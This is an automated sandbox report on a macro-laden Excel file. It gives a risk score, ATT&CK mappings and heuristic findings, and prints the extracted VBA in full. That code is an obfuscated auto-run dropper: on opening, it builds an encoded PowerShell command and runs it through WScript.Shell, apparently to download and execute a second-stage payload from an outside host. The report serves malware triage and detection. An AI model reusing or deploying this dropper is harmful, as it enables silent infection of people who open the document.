MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The critical heuristic 'WScript.Shell usage' and the high heuristic 'CreateObject call' indicate that the VBA macro is designed to execute arbitrary code. The Workbook_Open macro is automatically triggered upon opening the document, suggesting an attempt to download and execute a second-stage payload. The obfuscated nature of the VBA code and the presence of encoded strings further support this conclusion.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
yvnxfkqzylaegnowyqcnpuhgelijjrg = "WSCript.shell" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ukdgnamfojmhj = CreateObject(yvnxfkqzylaegnowyqcnpuhgelijjrg) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub workbook_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8492 bytes |
SHA-256: 9317ed545ed193ac4dd7502586662f163d7a6b21269d1759ca1dc97eef86578c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 9 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AddTextBeforeSelection()
Selection.InsertBefore Text:="new text "
End Sub
Private Sub workbook_open()
absq.hmpa
iuyi = bfghfgfgh
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "absq"
Sub SetParagraphRange()
Dim docActive As Document
Dim rngParagraphs As Range
Set docActive = ActiveDocument
Set rngParagraphs = docActive.Range(Start:=docActive.Paragraphs(2).Range.Start, _
End:=docActive.Paragraphs(3).Range.End)
End Sub
Sub hmpa()
loqk = hff(213) & hff(191) & hff(182) & hff(146) & hff(161) & hff(181) & hff(146) & hff(194) & hff(193) & hff(208) & hff(233) & hff(208) & hff(183) & hff(228) & hff(229) & hff(208) & hff(218) & hff(183) & hff(208) & hff(222) & hff(222) & hff(146) & hff(159) & hff(183) & hff(146)
loqk = loqk & "WwBzAHkAcwB0AGUAbQAuAFQARQB4AFQALgBFAG4AQwBPAGQAaQBuAEcAXQA6ADoAdQBOAGkAYwBvAEQARQAuAGcAZQBUAFMAVABSAGkATgBHACgAWwBTAHkAcwBUAEUAbQAuAGMAbwBOAFYAZQByAFQAXQA6ADoARgBSAE8AbQBiAEEAcwBlADYANABTAFQAcgBpAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAW"
loqk = loqk & "QBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAZwBBAFoAQQBCAHgAQQBHAFkAQQBZAGcAQgA1AEEASABRAEEAYwBBAEIAagBBAEgAVQBBAGEAdwBCAGsAQQBIAFkAQQBaAGcAQgA1AEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGMAUQBCAGwAQQBHAFUAQQBjAGcAQgB0AEEARwBFAEEAYQBRAEIAMwBBAEcAawBBAGQAQQBCAHQAQQBIAGsAQQBkAFEAQgA2AEEARwBNAEEAYgBRAEEAZwBBAEMAdwBBAEkAQQBBAGsAQQBHAEkAQQBjAHcAQgB1AEEARwBVAEEAWgBBAEIAdABBAEcAOABBAGEAQQBCAGsAQQBHAHMAQQBhAHcAQgB0AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBiAFEAQgBRAEEARwA4AEEAVQBnAEIAMABBAEMAMABBAGIAUQBCAHYAQQBHAFEAQQBkAFEAQgBzAEEARQBVAEEASQBBAEIAaQBBAEUAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQg"
loqk = loqk & "BCAEEARwA0AEEAVQB3AEIARwBBAEcAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBWAEEAQgB6AEEARgBRAEEAYwBnAEIAQgBBAEcANABBAGMAdwBCAG0AQQBFAFUAQQBVAGcAQQBnAEEAQwAwAEEAVQB3AEIAdgBBAEgAVQBBAFUAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEASABFAEEAWgBRAEIAbABBAEgASQBBAGIAUQBCAGgAQQBHAGsAQQBkAHcAQgBwAEEASABRAEEAYgBRAEIANQBBAEgAVQBBAGUAZwBCAGoAQQBHADAAQQBJAEEAQQB0AEEARwBRAEEAUgBRAEIAVABBAEYAUQBBAFMAUQBCAE8AQQBFAEUAQQBWAEEAQgBKAEEARQA4AEEAVABnAEEAZwBBAEMAUQBBAFkAZwBCAHoAQQBHADQAQQBaAFEAQgBrAEEARwAwAEEAYgB3AEIAbwBBAEcAUQBBAGEAdwBCAHIAQQBHADAAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEcASQB"
loqk = loqk & "BAGMAdwBCAHUAQQBHAFUAQQBaAEEAQgB0AEEARwA4AEEAYQBBAEIAawBBAEcAcwBBAGEAdwBCAHQAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADQAQQBHAFUAQQBkAHcAQgBxAEEARwBjAEEAYgB3AEIAaQBBAEgARQBBAGEAdwBCAGoAQQBHAHMAQQBhAHcAQgB0AEEARwBFAEEAYgBBAEIAcQBBAEcAMABBAGEAZwBCAHQAQQBIAEUAQQBjAEEAQQA5AEEAQwBRAEEAUgBRAEIATwBBAEYAWQBBAE8AZwBCADAAQQBFAFUAQQBUAFEAQgB3AEEAQwBzAEEASgB3AEIAYwBBAEcANABBAGQAZwBCAG8AQQBIAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGcAQQBaAEEAQgB4AEEARwBZAEEAWQBnAEIANQBBAEgAUQBBAGMAQQBCAGoAQQBIAFUAQQBhAHcAQgBrAEEASABZAEEAWgBnAEIANQBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3"
loqk = loqk & "AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFkAdwBCAGsAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAYwB3AEIAagBBAEcAOABBAGMAZwBCAGsAQQBHAEUAQQBjAEEAQgB3AEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAdwBCAGgAQQBIAFEAQQBkAEEAQgBoAEEARwBNAEEAYQBBAEIAdABBAEcAVQBBAGIAZwBCADAAQQBIAE0AQQBMAHcAQQA0AEEARABjAEEATQBBAEEAMgBBAEQAYwBBAE0AdwBBADMAQQBEAFEAQQBOAGcAQQAzAEEARABjAEEATgBBAEEAMQBBAEQAawBBAE4AdwBBADIAQQBEAFUAQQBNAGcAQQB2AEEARABnAEEATgB3AEEAeQBBAEQAVQBBAE0AUQBBADAAQQBEAEkAQQBOAFEAQQAxAEEARABJAEEATwBRAEEANABBAEQARQBBAE0AQQBBADEAQQBEAFEAQQBOAHcAQQAwAEEAQwA4AEEAZABBAEEANQBBAEUASQBBAFQAdwBCAEYAQQBFAEkAQQBSAEEAQgBwAEEASABVAEEAYQB3AEIAdQBBAEcAcwBBA"
loqk = loqk & "FQAUQBCAGkAQQBHAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCADQAQQBHAFUAQQBkAHcAQgBxAEEARwBjAEEAYgB3AEIAaQBBAEgARQBBAGEAdwBCAGoAQQBHAHMAQQBhAHcAQgB0AEEARwBFAEEAYgBBAEIAcQBBAEcAMABBAGEAZwBCAHQAQQBIAEUAQQBjAEEAQQA3AEEAQQAwAEEAQwBnAEIANABBAEcAUQBBAGMAUQBCAG0AQQBHAEkAQQBlAFEAQgAwAEEASABBAEEAWQB3AEIAMQBBAEcAcwBBAFoAQQBCADIAQQBHAFkAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAWgBBAEIAdQBBAEMANABBAFoAQQBCAHAAQQBIAE0AQQBZAHcAQgB2AEEASABJAEEAWgBBAEIAaABBAEgAQQBBAGMAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAWQBRAEIAMABBAEgAUQBBAFkAUQBCAGoAQQBHAGcAQQBiAFEAQgBsAE"
loqk = loqk & "EARwA0AEEAZABBAEIAegBBAEMAOABBAE8AQQBBADMAQQBEAEEAQQBOAGcAQQAzAEEARABNAEEATgB3AEEAMABBAEQAWQBBAE4AdwBBADMAQQBEAFEAQQBOAFEAQQA1AEEARABjAEEATgBnAEEAMQBBAEQASQBBAEwAdwBBADQAQQBEAGMAQQBNAGcAQQAxAEEARABFAEEATgBBAEEAeQBBAEQAVQBBAE4AUQBBAHkAQQBEAGsAQQBPAEEAQQB4AEEARABBAEEATgBRAEEAMABBAEQAYwBBAE4AQQBBAHYAQQBIAFEAQQBPAFEAQgBDAEEARQA4AEEAUgBRAEIAQwBBAEUAUQBBAGEAUQBCADEAQQBHAHMAQQBiAGcAQgByAEEARQAwAEEAWQBnAEIAaQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAZQBBAEIAbABBAEgAYwBBAGEAZwBCAG4AQQBHADgAQQBZAGcAQgB4AEEARwBzAEEAWQB3AEIAcgBBAEcAcwBBAGIAUQBCAGgAQQBHAHcAQQBhAGcAQgB0AEEARwBvAEEAYgBRAEIAeABBAEgAQQBBAE8"
loqk = loqk & "AdwBBAE4AQQBBAG8AQQBlAEEAQgBrAEEASABFAEEAWgBnAEIAaQBBAEgAawBBAGQAQQBCAHcAQQBHAE0AQQBkAFEAQgByAEEARwBRAEEAZABnAEIAbQBBAEgAawBBAEkAQQBBAG4AQQBHAGcAQQBkAEEAQgAwAEEASABBAEEAYwB3AEEANgBBAEMAOABBAEwAdwBCAGoAQQBHAFEAQQBiAGcAQQB1AEEARwBRAEEAYQBRAEIAegBBAEcATQBBAGIAdwBCAHkAQQBHAFEAQQBZAFEAQgB3AEEASABBAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBHAEUAQQBkAEEAQgAwAEEARwBFAEEAWQB3AEIAbwBBAEcAMABBAFoAUQBCAHUAQQBIAFEAQQBjAHcAQQB2AEEARABnAEEATgB3AEEAdwBBAEQAWQBBAE4AdwBBAHoAQQBEAGMAQQBOAEEAQQAyAEEARABjAEEATgB3AEEAMABBAEQAVQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQB5AEEAQwA4AEEATwBBAEEAMwBBAEQASQBBAE4AUQBBAHgAQQBEAFEAQQBNAGcAQQAxAEEA"
loqk = loqk & "RABVAEEATQBnAEEANQBBAEQAZwBBAE0AUQBBAHcAQQBEAFUAQQBOAEEAQQAzAEEARABRAEEATAB3AEIAMABBAEQAawBBAFEAZwBCAFAAQQBFAFUAQQBRAGcAQgBFAEEARwBrAEEAZABRAEIAcgBBAEcANABBAGEAdwBCAE4AQQBHAEkAQQBZAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAGcAQQBaAFEAQgAzAEEARwBvAEEAWgB3AEIAdgBBAEcASQBBAGMAUQBCAHIAQQBHAE0AQQBhAHcAQgByAEEARwAwAEEAWQBRAEIAcwBBAEcAbwBBAGIAUQBCAHEAQQBHADAAQQBjAFEAQgB3AEEARABzAEEARABRAEEASwBBAEgAMABBAFkAdwBCAGgAQQBIAFEAQQBZAHcAQgBvAEEASABzAEEAZgBRAEEAPQAiACkAKQB8AGkAZQB4AA=="
On Error Resume Next
fgwtkzkxydqtplhefritezkzd = loqk
pmjsiibvqoddmgkoylolr (fgwtkzkxydqtplhefritezkzd)
End Sub
Sub SetRangeForFirstTenCharacters()
Dim rngTenCharacters As Range
Set rngTenCharacters = ActiveDocument.Range(Start:=0, End:=10)
End Sub
Function pmjsiibvqoddmgkoylolr(pvbojanhuggrmcahdwuaoejhfcfh As String)
hgkovmmxz = 7 - 7
csdcsd = "asda sadsa sda"
yvnxfkqzylaegnowyqcnpuhgelijjrg = "WSCript.shell"
Set ukdgnamfojmhj = CreateObject(yvnxfkqzylaegnowyqcnpuhgelijjrg)
qacdx = ukdgnamfojmhj.Run(pvbojanhuggrmcahdwuaoejhfcfh, hgkovmmxz)
End Function
Sub SetRangeForFirstThreeWords()
Dim docActive As Document
Dim rngThreeWords As Range
Set docActive = ActiveDocument
Set rngThreeWords = docActive.Range(Start:=docActive.Words(1).Start, _
End:=docActive.Words(3).End)
End Sub
Function hff(bgfbg As Variant)
bcvv = "gfgdfs vxcb 98"
hff = Chr(bgfbg - 114)
fgdsg = "vcxb xvcb sgd vcxb fsdg fgsdgdf"
End Function
Sub Macro1()
With Selection.ParagraphFormat
.LeftIndent = InchesToPoints(0)
.RightIndent = InchesToPoints(0)
.SpaceBefore = 6
.SpaceAfter = 6
.LineSpacingRule = 0
.Alignment = wdAlignParagraphLeft
.WidowControl = True
.KeepWithNext = False
.KeepTogether = False
.PageBreakBefore = False
.NoLineNumber = False
.Hyphenation = True
.FirstLineIndent = InchesToPoints(0)
.OutlineLevel = 10
End With
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 28672 bytes |
SHA-256: 730bad1bd1d56980a1dfae7cc241523f2e26b78e0a6b0411bf236d1fcd3ad88c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 9 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.